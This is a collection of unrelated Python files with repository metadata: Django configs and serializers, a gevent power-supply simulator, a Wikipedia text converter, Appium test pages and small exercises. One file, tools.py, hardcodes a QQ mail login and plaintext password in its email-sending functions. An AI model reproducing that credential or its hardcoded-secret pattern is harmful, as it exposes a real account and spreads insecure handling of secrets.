checker.set_nodal_displacement_tol(trans_tol=trans_tol, rot_tol=rot_tol)
return checker
def test_extrusion_stiffness(extrusion_dir, extrusion_problem, stiffness_tol, known_failure):
p = os.path.join(extrusion_dir, extrusion_problem)
checker = create_stiffness_checker(p, trans_tol=stiffness_tol[0], rot_tol=stiffness_tol[1], verbose=False)
is_stiff = checker.solve()
success, nodal_displacement, fixities_reaction, element_reaction = checker.get_solved_results()
assert is_stiff == success
trans_tol, rot_tol = checker.get_nodal_deformation_tol()
max_trans, max_rot, max_trans_vid, max_rot_vid = checker.get_max_nodal_deformation()
compliance = checker.get_compliance()
assert compliance > 0, 'Compliance must be bigger than zero! (no matter how small the value is), its likely have something wrong with the material / cross sectional properties. Does it have cross section area, Jx, Ix, Iy, Iz value? (compared to radius)'
if not success:
print('\n' + '='*6)
print('Test stiffness on problem: {}'.format(p))
# The inverse of stiffness is flexibility or compliance
print('Stiff: {} | Compliance: {}'.format(is_stiff, compliance))
print('Max translation deformation: {0:.5f} / {1:.5} = {2:.5}, at node #{3}'.format(
max_trans, trans_tol, max_trans / trans_tol, max_trans_vid))
print('Max rotation deformation: {0:.5f} / {1:.5} = {2:.5}, at node #{3}'.format(
max_rot, rot_tol, max_rot / rot_tol, max_rot_vid))
if extrusion_problem not in known_failure:
assert success
|
[
"yijiangh@mit.edu"
] |
yijiangh@mit.edu
|
5b641a6aa3fe121f56f85194dd5c3617d7814729
|
e2220b78a968d8bff21061bdf67b027d933bb2be
|
/rentoMojo/rentoMojo/asgi.py
|
5399867dc8911d3da9c3bd8daa85d9e095910552
|
[] |
no_license
|
amannvl/rentoMojo
|
eab2ed103ed32e9e81424093571019160d9c49c0
|
0f4f0076f00ccd7178f42dee0081ee0d58027874
|
refs/heads/master
| 2023-03-08T10:24:44.339962
| 2021-02-20T09:48:30
| 2021-02-20T09:48:30
| 340,601,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 395
|
py
|
"""
ASGI config for rentoMojo project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'rentoMojo.settings')
application = get_asgi_application()
|
[
"Your-Email"
] |
Your-Email
|
d7eaedaf350f3b86d019a17c881535f17a757277
|
7b1de4a2607e3125b719c499a05bf6e2d3ec532d
|
/design_patterns/Command/ex2/actions.py
|
12e98f5164f5d62f49fffacf1ac797ab96234447
|
[] |
no_license
|
ganqzz/sandbox_py
|
61345ac7bddb09081e02decb78507daa3030c1e8
|
cc9e1ecca2ca99f350a3e2c3f51bbdb5eabc60e1
|
refs/heads/master
| 2022-12-01T21:54:38.461718
| 2021-09-04T03:47:14
| 2021-09-04T03:47:14
| 125,375,767
| 0
| 1
| null | 2023-04-16T00:55:51
| 2018-03-15T14:00:47
|
Python
|
UTF-8
|
Python
| false
| false
| 599
|
py
|
# Receiver classes
class Appliance(object):
def __init__(self, name):
self._name = name
def on(self):
print('%s has been turned on.' % self._name)
def off(self):
print('%s has been turned off.' % self._name)
class Door(object):
def __init__(self, name):
self.name = name
def lock(self):
print("%s is locked." % self.name)
def unlock(self):
print("%s is unlocked." % self.name)
class Security(object):
def arm(self):
print('Security system armed')
def disarm(self):
print('Security disarmed')
|
[
"ganqzz@users.noreply.github.com"
] |
ganqzz@users.noreply.github.com
|
41a9e2c99011225acf96d6969a1bfc6ac8265ef4
|
837c1bd7e021f071fbee78e2e4c7c27695ff62db
|
/meiduo_lianxi/apps/areas/migrations/0001_initial.py
|
9296f6f3a0d7380538a93604e5129fed0e6b4aa4
|
[
"MIT"
] |
permissive
|
Wang-TaoTao/lianxiku
|
0ae87b3db98e9f869a2a9901c24da80ccb63fe6f
|
0f58b6859b4dcd4e81d8f7c4f67be68f245811cc
|
refs/heads/master
| 2020-07-06T01:21:59.869064
| 2019-09-16T16:05:24
| 2019-09-16T16:05:24
| 202,844,338
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 968
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2019-08-23 09:00
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Area',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20, verbose_name='名称')),
('parent', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='subs', to='areas.Area', verbose_name='上级行政区划')),
],
options={
'verbose_name': '省市区',
'db_table': 'tb_areas',
'verbose_name_plural': '省市区',
},
),
]
|
[
"xwp_fullstack@163.com"
] |
xwp_fullstack@163.com
|
47f5d95e1f02be15883f5396f1c1136658fc91af
|
8660f77e77948f7646e2f0e4e46b46c0c7b318c5
|
/examples/ps-simulator.py
|
1e61d5fc5c05526a910c34ea8942a6492baf3424
|
[] |
no_license
|
ajoubertza/icalepcs-workshop
|
b6c227c4e6f79181222c40a9c505d3c41a8d068f
|
06ff925fe4724a71c17bbd193e3387884a919e51
|
refs/heads/gh-pages
| 2020-08-03T09:28:09.959380
| 2019-10-06T01:04:06
| 2019-10-06T01:04:06
| 211,702,036
| 1
| 1
| null | 2019-10-05T16:28:27
| 2019-09-29T17:45:48
|
HTML
|
UTF-8
|
Python
| false
| false
| 3,665
|
py
|
#!/usr/bin/env python3
import time
import random
import logging
import gevent.server
DEFAULT_BIND = ''
DEFAULT_PORT = 45000
class Attr:
def __init__(self, *, initial_value=0.,
encode=lambda x: bytes(str(x), 'ascii'),
decode=float):
self.value = initial_value
self.encode = encode
self.decode = decode
def get(self):
return self.encode(self.value)
def set(self, value):
self.value = self.decode(value)
class Calibrate(Attr):
def set(self, value):
self.ts = time.time()
super().set(value)
class State(Attr):
def __init__(self, calib, *args, **kwargs):
kwargs['initial_value'] = 0
kwargs['decode'] = int
super().__init__(*args, **kwargs)
self.calib = calib
calib.ts = 0
def get(self):
self.value = 0
if time.time() - self.calib.ts < 2:
self.value = 1
return super().get()
class PSSimulator(gevent.server.StreamServer):
class Error(Exception):
pass
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.log = logging.getLogger(f'simulator.{self.server_port}')
calib = Calibrate(initial_value=0)
self.attrs = {
b'stat': State(calib),
b'vol': Attr(initial_value=0.1),
b'curr': Attr(initial_value=0.),
b'calib': calib,
}
def __getitem__(self, name):
return self.attrs[name].get()
def __setitem__(self, name, value):
self.attrs[name].set(value)
def handle(self, sock, addr):
log = self.log
log.info('new connection from %r', addr)
fileobj = sock.makefile(mode='rb')
while True:
request = fileobj.readline()
if not request:
log.info('disconnected %r', addr)
break
log.info('request %r', request)
reply = b'ERROR'
try:
reply = self.handle_request(request)
except PSSimulator.Error:
pass
except:
log.exception('Unforseen error')
gevent.sleep(1e-1)
sock.sendall(reply + b'\n')
log.info('replyed %r', reply)
fileobj.close()
def handle_request(self, request):
req_lower = request.strip().lower()
is_query = b'?' in req_lower
pars = req_lower.split()
name = pars[0]
if is_query:
name = name[:-1] # take out '?'
if is_query:
return self[name]
self[name] = pars[1]
return b'OK'
def main(number=1, bind=DEFAULT_BIND, port=DEFAULT_PORT, **kwargs):
servers = []
logging.info('starting simulator...')
for i in range(number):
address = bind, port+i
server = PSSimulator(address)
server.start()
servers.append(server)
server.log.info('simulator listenning on %r!', address)
try:
while True:
# gevent.joinall(servers)
gevent.sleep(1)
except KeyboardInterrupt:
logging.info('Ctrl-C pressed. Bailing out!')
for server in servers:
server.stop()
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--port', type=int, default=DEFAULT_PORT)
parser.add_argument('--bind', default=DEFAULT_BIND)
parser.add_argument('--log-level', default='info')
parser.add_argument('--number', type=int, default=1)
args = parser.parse_args()
logging.basicConfig(level=args.log_level.upper())
main(**vars(args))
|
[
"coutinhotiago@gmail.com"
] |
coutinhotiago@gmail.com
|
4672862d3327093a2d281b7b1a5b7c8ee31255f7
|
fafbddf21e669a20e3329d85f8edb06fb03d5a82
|
/wp2txt2json_run.py
|
fd6589378173f0054d69a1acae25e2572e872c3d
|
[] |
no_license
|
quesada/runs-gensim
|
07e188ca971d9734989c1981f297f00d7813eedc
|
aae75cc3188b99bd571fe7bbef008ac94bf3918a
|
refs/heads/master
| 2020-06-05T00:46:10.856429
| 2011-09-01T19:14:35
| 2011-09-01T19:14:35
| 1,306,724
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,042
|
py
|
#!/usr/bin/env python
# encoding: utf-8
"""
wp2txt2json.py
Created by Stephan Gabler on 2011-06-09.
Copyright (c) 2011 __MyCompanyName__. All rights reserved.
"""
from os import path
import codecs
import glob
import json
import os
import re
import sys
import time
import tools
def main(param_file=None):
# setup
p, base_path, output_dir = tools.setup(param_file)
logger = tools.get_logger('gensim', path.join(output_dir, "run.log"))
logger.info("running %s" % ' '.join(sys.argv))
# in test case
if param_file:
files = [path.join(base_path, p['wiki_txt'])]
else:
files = glob.glob(path.join(base_path, p['wiki_txt']) + '*.txt')
out = codecs.open(os.path.join(output_dir, 'wiki.json'), mode='w', encoding='utf-8')
headline = re.compile('\[\[(.*)\]\]')
level2 = re.compile('== (.*) ==')
t0 = time.time()
c = 0
res = {}
for file in files:
print 'work on: %s' % file
with codecs.open(file, encoding='utf-8') as f:
for line in f:
# ignore linebreaks
if line == '\n':
continue
# if headline found
if headline.search(line):
if len(res) > 0:
out.write(json.dumps(res, encoding='utf-8', ensure_ascii=False) + '\n')
topic = headline.search(line).groups()[0]
res = {topic: {}}
sub = None
elif level2.search(line):
sub = level2.search(line).groups()[0]
else:
if not sub:
res[topic].setdefault('desc', []).append(line.strip())
else:
res[topic].setdefault(sub, []).append(line.strip())
c += 1
print 'average execution time: %f' % ((time.time() - t0) / c)
out.write(json.dumps(res, encoding='utf-8', ensure_ascii=False) + '\n')
print time.time() - t0
if __name__ == '__main__':
main()
|
[
"stephan.gabler@gmail.com"
] |
stephan.gabler@gmail.com
|
4279424d2d636b5183bcdaca92e5e30219f6fbc4
|
0a9949a7dbe5f7d70028b22779b3821c62eb6510
|
/static/rice/tools.py
|
542ed77243cfdf7ef84167c7dd93f31ce1e57930
|
[] |
no_license
|
744996162/warehouse
|
ed34f251addb9438a783945b6eed5eabe18ef5a2
|
3efd299a59a0703a1a092c58a6f7dc2564b92e4d
|
refs/heads/master
| 2020-06-04T22:10:14.727156
| 2015-07-03T09:40:09
| 2015-07-03T09:40:09
| 35,603,929
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,322
|
py
|
#ecoding=utf-8
__author__ = 'Administrator'
import os
import xlwt
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
import datetime
from email.mime.image import MIMEImage
# import sys
# reload(sys)
# sys.setdefaultencoding('utf-8')
def getYestaday():
now_time = datetime.datetime.now()
yes_time = now_time + datetime.timedelta(days=-1)
return yes_time.strftime('%Y%m%d')
def excel_write(text_in="0128/result.txt",excel_out="0128/result0128.xls",table_name="sheet1"):
fr_in=open(text_in)
wbk=xlwt.Workbook(encoding='utf-8')
sheet=wbk.add_sheet(table_name,True)
for i,line in enumerate(fr_in.readlines()):
stringArr=line.strip().split("\t")
for j,str in enumerate(stringArr):
if j==6:
str=int(str)
sheet.write(i,j,str)
# print i,stringArr
export=excel_out
wbk.save(export)
return excel_out
def excel_write2(text_in1="0128/result.txt",text_in2="0128/error.txt",excel_out="0128/result0128.xls",table_name1="sheet1",table_name2="sheet2"):
fr_in1=open(text_in1)
fr_in2=open(text_in2)
wbk=xlwt.Workbook(encoding='utf-8')
sheet1=wbk.add_sheet(table_name1,True)
for i,line in enumerate(fr_in1.readlines()):
stringArr=line.strip().split("\t")
for j,str in enumerate(stringArr):
if j==6:
str=int(str)
sheet1.write(i,j,str)
sheet2=wbk.add_sheet(table_name2,True)
for i,line in enumerate(fr_in2.readlines()):
stringArr=line.strip().split("\t")
for j,str in enumerate(stringArr):
if j==6:
str=int(str)
sheet2.write(i,j,str)
export=excel_out
wbk.save(export)
return excel_out
def send_mail(to_list,sub,content):
#############
#to_list为收件人
#sub为邮件标题
#content为邮件内容
###############
#设置服务器,用户名、口令以及邮箱的后缀
mail_host="smtp.qq.com"
mail_user="744996162"
mail_pass="a1b2c3e48517343"
mail_postfix="qq.com"
me=mail_user+"<"+mail_user+"@"+mail_postfix+">"
msg = MIMEText(content)
msg['Subject'] = sub
msg['From'] = me
msg['To'] = to_list
try:
s = smtplib.SMTP()
s.connect(mail_host)
s.login(mail_user,mail_pass)
s.sendmail(me, to_list, msg.as_string())
s.close()
return True
except Exception as e:
print(e)
return False
def send_mail2(to_list,sub,content,attach_file="0128/result.txt"):
#############
#to_list为收件人
#sub为邮件标题
#content为邮件内容
###############
#设置服务器,用户名、口令以及邮箱的后缀
mail_host="smtp.qq.com"
mail_user="744996162"
mail_pass="a1b2c3e48517343"
mail_postfix="qq.com"
me=mail_user+"<"+mail_user+"@"+mail_postfix+">"
msg=MIMEMultipart()
msg['Subject'] = sub
msg['From'] = me
msg['To'] = to_list
att = MIMEApplication(file(attach_file, 'rb').read())
att["Content-Type"] = 'application/octet-stream'
att.add_header('content-disposition','attachment',filename=attach_file)
msg.attach(att)
try:
s = smtplib.SMTP()
s.connect(mail_host)
s.login(mail_user,mail_pass)
s.sendmail(me, to_list, msg.as_string())
s.close()
return True
except Exception as e:
print(e)
return False
pass
def send_mail_attach_dir(to_list,sub,content,dir_path="20150128"):
#############
#to_list为收件人
#sub为邮件标题
#content为邮件内容
###############
#设置服务器,用户名、口令以及邮箱的后缀
mail_host="smtp.qq.com"
mail_user="744996162"
mail_pass="a1b2c3e48517343"
mail_postfix="qq.com"
me=mail_user+"<"+mail_user+"@"+mail_postfix+">"
msg=MIMEMultipart()
msg['Subject'] = sub
msg['From'] = me
msg['To'] = to_list
path_list=get_all_file(dir_path)
for file_path in path_list:
try:
att = MIMEApplication(file(file_path, 'rb').read())
att["Content-Type"] = 'application/octet-stream'
att.add_header('content-disposition','attachment',filename=file_path)
msg.attach(att)
except Exception as e:
print(e)
try:
s = smtplib.SMTP()
s.connect(mail_host)
s.login(mail_user,mail_pass)
s.sendmail(me, to_list, msg.as_string())
s.close()
return True
except Exception as e:
print(e)
return False
pass
def get_all_file(dir_path="20150128"):
file_list = []
if dir_path is None:
raise Exception("floder_path is None")
for dirpath, dirnames, filenames in os.walk(dir_path):
for name in filenames:
# print(name)
file_list.append(dirpath + '/' + name)
return file_list
if __name__=="__main__":
# excel_write2()
# to_list="744996162@qq.com"
# send_mail2(to_list,"hello","mail test")
floder_path="20150128"
file_list=get_all_file(floder_path)
for i in file_list:
print i
pass
to_list="744996162@qq.com"
send_mail_attach_dir(to_list,"hello","mail test")
|
[
"744996162@qq.com"
] |
744996162@qq.com
|
7d35d105cdd8d6255538d78fb8262fabfedcd14f
|
1e17cce2124d772871eaa7086a37e98b5af14adf
|
/Alphabets/Q.py
|
59937c56bc6e491340c16d5360de8e91efd68e2d
|
[] |
no_license
|
venukumarbv/PythonPatternPrinting
|
b5e62e23ac2e9d929a74f5b58a42116f27163889
|
3318907b8e930ada6e367cc04a0b6e314666ec24
|
refs/heads/master
| 2022-12-23T02:02:18.793081
| 2020-07-03T07:21:23
| 2020-07-03T07:21:23
| 276,833,884
| 0
| 1
| null | 2020-09-30T19:44:18
| 2020-07-03T07:14:53
|
Python
|
UTF-8
|
Python
| false
| false
| 508
|
py
|
'''
* * *
* *
* *
* *
* * *
* * *
* * * *
'''
for row in range(7):
for col in range(5):
if row in {0, 6} and col in {1, 2, 3}:
print('*', end=' ')
elif row in range(1,6) and col in {0, 4}:
print('*', end=' ')
elif (row == 4 and col == 2) or (row == 5 and col == 3): \
print('*', end=' ')
elif row == 6 and col == 4:
print('*', end=' ')
else:
print(' ', end=' ')
print()
|
[
"VKvision@venu.com"
] |
VKvision@venu.com
|
6f349d3c153769bb6bfa800268372e30579abeb6
|
a82aa8430e32eaf62df0f44b20afb0e7d50c3d7b
|
/ippon/tournament/seralizers.py
|
8c29e4688e49aed3e000d0f5c7bfc44a4784bbeb
|
[
"MIT"
] |
permissive
|
morynicz/ippon_back
|
314daac99f79247b749dc46d59a645a6eb840263
|
dce901bfc649c6f8efbbf0907654e0860606b3e3
|
refs/heads/master
| 2022-12-20T23:33:10.898738
| 2021-10-17T09:25:39
| 2021-10-17T09:25:39
| 124,851,931
| 0
| 2
|
MIT
| 2022-12-08T12:37:26
| 2018-03-12T07:43:17
|
Python
|
UTF-8
|
Python
| false
| false
| 3,502
|
py
|
from django.contrib.auth.models import User
from rest_framework import serializers
from rest_framework.exceptions import ValidationError
import ippon.models.player as plm
import ippon.models.tournament as tm
import ippon.player.serializers as pls
class TournamentParticipationSerializer(serializers.ModelSerializer):
is_age_ok = serializers.BooleanField(source='check_is_age_ok', read_only=True)
is_rank_ok = serializers.BooleanField(source='check_is_rank_ok', read_only=True)
is_sex_ok = serializers.BooleanField(source='check_is_sex_ok', read_only=True)
tournament_id = serializers.IntegerField(source='tournament.id')
player = pls.ShallowPlayerSerializer()
class Meta:
model = tm.TournamentParticipation
fields = (
'id',
'is_paid',
'is_registered',
'is_qualified',
'is_age_ok',
'is_rank_ok',
'is_sex_ok',
'player',
'tournament_id',
'notes'
)
def create(self, validated_data):
if not isinstance(self.initial_data['player']['id'], int):
raise ValidationError('player.id must be an integer')
filtered = plm.Player.objects.filter(pk=self.initial_data['player']['id'])
if not filtered.exists():
raise ValidationError('no such player')
participation = tm.TournamentParticipation.objects.create(
player=filtered.first(),
tournament=tm.Tournament.objects.get(pk=validated_data['tournament']['id'])
)
return participation
def update(self, instance, validated_data):
instance.is_paid = validated_data['is_paid']
instance.is_registered = validated_data['is_registered']
instance.is_qualified = validated_data['is_qualified']
instance.notes = validated_data['notes']
instance.save()
return instance
class TournamentAdminSerializer(serializers.ModelSerializer):
tournament_id = serializers.IntegerField(source='tournament.id')
user = serializers.DictField(source='get_user')
class Meta:
model = tm.TournamentAdmin
fields = (
'tournament_id',
'id',
'is_master',
'user'
)
read_only_fields = ('user',)
def create(self, validated_data):
if not isinstance(self.initial_data['user']['id'], int):
raise ValidationError('user.id must be an integer')
admin = tm.TournamentAdmin.objects.create(
user=User.objects.get(pk=self.initial_data['user']['id']),
tournament=tm.Tournament.objects.get(pk=validated_data['tournament']['id']),
is_master=False
)
return admin
def update(self, instance, validated_data):
instance.is_master = validated_data['is_master']
instance.save()
return instance
class TournamentSerializer(serializers.ModelSerializer):
class Meta:
model = tm.Tournament
fields = (
'id',
'name',
'date',
'city',
'address',
'description',
'webpage',
'team_size',
'group_match_length',
'ko_match_length',
'final_match_length',
'finals_depth',
'age_constraint',
'sex_constraint',
'rank_constraint',
'rank_constraint_value',
'age_constraint_value'
)
|
[
"morynicz@gmail.com"
] |
morynicz@gmail.com
|
a62739539e974b10b70d26d979a69301251dca72
|
c49590eb7f01df37c8ec5fef00d0ffc7250fa321
|
/test/test_res_mtf_order_cancel.py
|
b4faf84610f01187cc9e405cac99e3cb98b887c9
|
[] |
no_license
|
harshad5498/ks-orderapi-python
|
373a4b85a56ff97e2367eebd076f67f972e92f51
|
237da6fc3297c02e85f0fff1a34857aaa4c1d295
|
refs/heads/master
| 2022-12-09T19:55:21.938764
| 2020-09-03T05:22:51
| 2020-09-03T05:22:51
| 293,533,651
| 0
| 0
| null | 2020-09-07T13:19:25
| 2020-09-07T13:19:24
| null |
UTF-8
|
Python
| false
| false
| 1,481
|
py
|
# coding: utf-8
"""
KS Trade API's
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 1.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import openapi_client
from openapi_client.models.res_mtf_order_cancel import ResMTFOrderCancel # noqa: E501
from openapi_client.rest import ApiException
class TestResMTFOrderCancel(unittest.TestCase):
"""ResMTFOrderCancel unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test ResMTFOrderCancel
include_option is a boolean, when False only required
params are included, when True both required and
optional params are included """
# model = openapi_client.models.res_mtf_order_cancel.ResMTFOrderCancel() # noqa: E501
if include_optional :
return ResMTFOrderCancel(
orderId = '0',
message = '0'
)
else :
return ResMTFOrderCancel(
)
def testResMTFOrderCancel(self):
"""Test ResMTFOrderCancel"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
|
[
"thebhushanp@gmail.com"
] |
thebhushanp@gmail.com
|
5ffe3a1f93e81e9e2774504dd769dcc13ce6537b
|
c0c533728e049d41206282bb929bf66aedc1d154
|
/apps/application/migrations/0011_auto_20180516_0149.py
|
9ce644b45d34365c8c220b0648d3c407cf6e19b2
|
[] |
no_license
|
nolan1299/madras
|
5df425a7796fae71f3c9d6763a06aa08145d50e0
|
489f6279160622e72fcaf8654ec0c1bed7413fe8
|
refs/heads/master
| 2020-03-17T16:30:34.728894
| 2018-05-25T18:02:13
| 2018-05-25T18:02:13
| 133,751,296
| 0
| 0
| null | 2018-05-17T03:03:48
| 2018-05-17T03:03:48
| null |
UTF-8
|
Python
| false
| false
| 832
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2018-05-16 01:49
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('application', '0010_resume'),
]
operations = [
migrations.AddField(
model_name='resume',
name='created_at',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AlterField(
model_name='resume',
name='application',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='resumes', to='application.Application'),
),
]
|
[
"jreinstra@gmail.com"
] |
jreinstra@gmail.com
|
6f8b879786c5c0c3dc31c1641bfe4a723a5afa62
|
b2cce36e9f7dba3f393ce5a177cd4d03eced094a
|
/PageObject/me/CollectSwipeDellPage.py
|
f4c7122b39fce18cf1115b05b2baee5de90966a1
|
[] |
no_license
|
tachibana814/appium
|
180192ba0727f4ab0cdfaec54f332ce603e203b4
|
1f8945f8fa2057a46f2291d03de152af2566ad55
|
refs/heads/master
| 2021-08-22T22:34:26.056831
| 2017-12-01T13:47:57
| 2017-12-01T13:47:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,383
|
py
|
from Base.BaseStatistics import countSum, countInfo
from Base.BaseYaml import getYam
from Base.BaseOperate import OperateElement
from Base.BaseElementEnmu import Element as be
import re
class CollectSwipeDelPage:
'''
滑动删除收藏
isOperate: 操作失败,检查点就失败,kwargs: WebDriver driver, String path(yaml配置参数)
'''
def __init__(self, **kwargs):
self.driver = kwargs["driver"]
if kwargs.get("launch_app", "0") == "0": # 若为空,重新打开app
self.driver.launch_app()
self.path = kwargs["path"]
self.operateElement = OperateElement(self.driver)
self.isOperate = True
test_msg = getYam(self.path)
self.testInfo = test_msg["testinfo"]
self.testCase = test_msg["testcase"]
self.testcheck = test_msg["check"]
self.get_value = []
self.msg = ""
'''
操作步骤
logTest 日记记录器
'''
def operate(self, logTest):
for item in self.testCase:
result = self.operateElement.operate(item, self.testInfo, logTest)
if not result["result"]:
m_s_g = self.msg + "\n" if self.msg != "" else ""
msg = m_s_g + "执行过程中失败,请检查元素是否存在" + item["element_info"]
print(msg)
self.testInfo[0]["msg"] = msg
self.msg = m_s_g + msg
self.isOperate = False
return False
if item.get("operate_type", "0") == be.SWIPE_LEFT: # 根据元素左滑动
web_element = self.driver.find_elements_by_id(item["element_info"])[item["index"]]
start = web_element.location
# 获取控件开始位置的坐标轴
startx = start["x"]
starty = start["y"]
# 获取控件坐标轴差
size1 = web_element.size
width = size1["width"]
height = size1["height"]
# 计算出控件结束坐标
endX = width + startx
endY = height + starty
self.driver.swipe(endX-50, endY, starty+500, endY)
if item.get("operate_type", "0") == be.GET_VALUE:
self.get_value.append(result["text"])
return True
def checkPoint(self, **kwargs):
result = self.check(**kwargs)
if result is not True and be.RE_CONNECT:
self.msg = "用例失败重连过一次,失败原因:" + self.testInfo[0]["msg"]
kwargs["logTest"].buildStartLine(kwargs["caseName"] + "_失败重连") # 记录日志
# self.operateElement.switchToNative()
self.driver.launch_app()
self.isOperate = True
self.get_value = []
self.operate(kwargs["logTest"])
result = self.check(**kwargs)
self.testInfo[0]["msg"] = self.msg
self.operateElement.switchToNative()
countSum(result)
countInfo(result=result, testInfo=self.testInfo, caseName=kwargs["caseName"],
driver=self.driver, logTest=kwargs["logTest"], devices=kwargs["devices"], testCase=self.testCase,
testCheck=self.testcheck)
return result
'''
检查点
caseName:测试用例函数名 用作统计
logTest: 日志记录
devices 设备名
'''
def check(self, **kwargs):
result = True
m_s_g = self.msg + "\n" if self.msg != "" else ""
if self.isOperate:
for item in self.testcheck:
resp = self.operateElement.operate(item, self.testInfo, kwargs["logTest"])
if not resp["result"]: # 表示操作出现异常情况检查点为成功
print("操作失败,简单点为成功")
result = True
break
if resp["text"] in self.get_value: # 删除后数据对比
msg = m_s_g + "删除数据失败,删除前数据为:" + ".".join(self.get_value) + "当前获取的数据为:" + resp["text"]
self.msg = m_s_g + msg
print(msg)
self.testInfo[0]["msg"] = msg
break
else:
result = False
return result
if __name__ == "__main__":
pass
|
[
"284772894@qq.com"
] |
284772894@qq.com
|
ffdf703a0923d7b64e0319499dffc354cf526805
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Scripts/pyinstaller/build/lib/PyInstaller/hooks/hook-dynaconf.py
|
d8b99ecb1e4dab7a0cca50558645cd76d92825ed
|
[] |
no_license
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:837c53561512a82c5654188db01cd8d6fbe3b2a9eb1608240134ac0b77dda545
size 886
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
2f1a8a7c8912e0d47a5e9ad908e93778deb29aa0
|
6b7ae49d83c51c298f1ed4e5a8324db7ee393f06
|
/rms/urls.py
|
9c10cde55095b8e9e47bb26c15768b2c486c9e7b
|
[] |
no_license
|
MoTechStore/ma
|
6837596be92532f613e4b8f2bd91cbcf6daa103d
|
21a4c63f66681e2b919c8bfcfe3acf12de385205
|
refs/heads/main
| 2023-08-22T01:49:22.739313
| 2021-10-05T10:03:25
| 2021-10-05T10:03:25
| 411,613,640
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,502
|
py
|
from django.urls import include, path
from . import views
from django.contrib import admin
from django.contrib.auth import views as auth_views
urlpatterns = [
path('', views.ma, name='ma'),
path('engine/', views.ai_search, name='engine'),
path('rms/', views.index, name='rms'),
path('report/', views.download_file, name='report'),
path('doc/', views.doc_insight, name='doc'),
path('cv/', views.cv_insight, name='cv'),
path('media/', views.media_check, name='media_check'),
path('loletter/', views.LOutgoingLetter.as_view(), name='loletter'),
path('liletter/', views.LIcomingLetter.as_view(), name='liletter'),
path('dashboard/', views.dashboard, name='dashboard'),
path('manage-files/<int:pk>', views.crudAdmin.found, name='found'),
path('save-data/', views.save_data, name='save_data'),
path('letter/', views.save_letter, name='save_letter'),
path('addfile/', views.add_file, name='addfile'),
path('addletter/', views.add_letter, name='addletter'),
path('save_file/', views.save_file, name='savefile'),
path('outletter/', views.out_letter, name='outletter'),
path('search/', views.search_ai, name='search'),
path('usearch/', views.usearch, name='usearch'),
path('sentletter/', views.outing_letter, name='sentletter'),
path('manage-files/', views.ManageFileView.as_view(), name='manage_files'),
path('search/', views.search_view, name='search'),
path('lsearch/', views.search_letter, name='search_letter'),
path('test/', views.test, name='test'),
path('r_admin_list/<int:pk>/update_file/', views.update_file, name='update_file'),
path('list-files/', views.FileListView.as_view(), name='list_file'),
path('logout/', views.logout_view, name='logout'),
path('signup/', views.signup, name='signup'),
path('r_admin_list/<int:pk>', views.AdminListReadView.as_view(), name='r_admin_list'),
path('al_update/<int:pk>', views.AlUpdateView.as_view(), name='al_update'),
path('u_update/<int:pk>', views.UserUpdateView.as_view(), name='u_update'),
path('admin_list_delete/<int:pk>', views.ListItDeleteView.as_view(), name='admin_list_delete'),
path('delete_user/<int:pk>', views.DeleteUserView.as_view(), name='delete_user'),
path('users/', views.UserView.as_view(), name='users'),
path('r_admin_truck/<int:pk>', views.AListTruckReadView.as_view(), name='r_admin_truck'),
path('login/', auth_views.LoginView.as_view(template_name='crow/login.html'), name='login'),
]
|
[
"mosesnoel02@gmail.com"
] |
mosesnoel02@gmail.com
|
cd4554e2cfdb845fb82245f7c366f0dfe311f709
|
3506d8c9a8391be52d24cff54f27537a92a7228c
|
/HackerRank/Implementation/Picking_Numbers.py
|
8120850a099a18dbfc581f4ef6b163926e96aed7
|
[] |
no_license
|
saumya-singh/CodeLab
|
04ef2c61c516c417c03c6a510e8b5e6e498fbe5d
|
9371f0d6bd45e5592dae25b50f0d04ba45ae67cf
|
refs/heads/master
| 2021-09-12T05:01:17.491312
| 2018-04-14T19:48:40
| 2018-04-14T19:48:40
| 81,596,628
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 970
|
py
|
#!/bin/python3
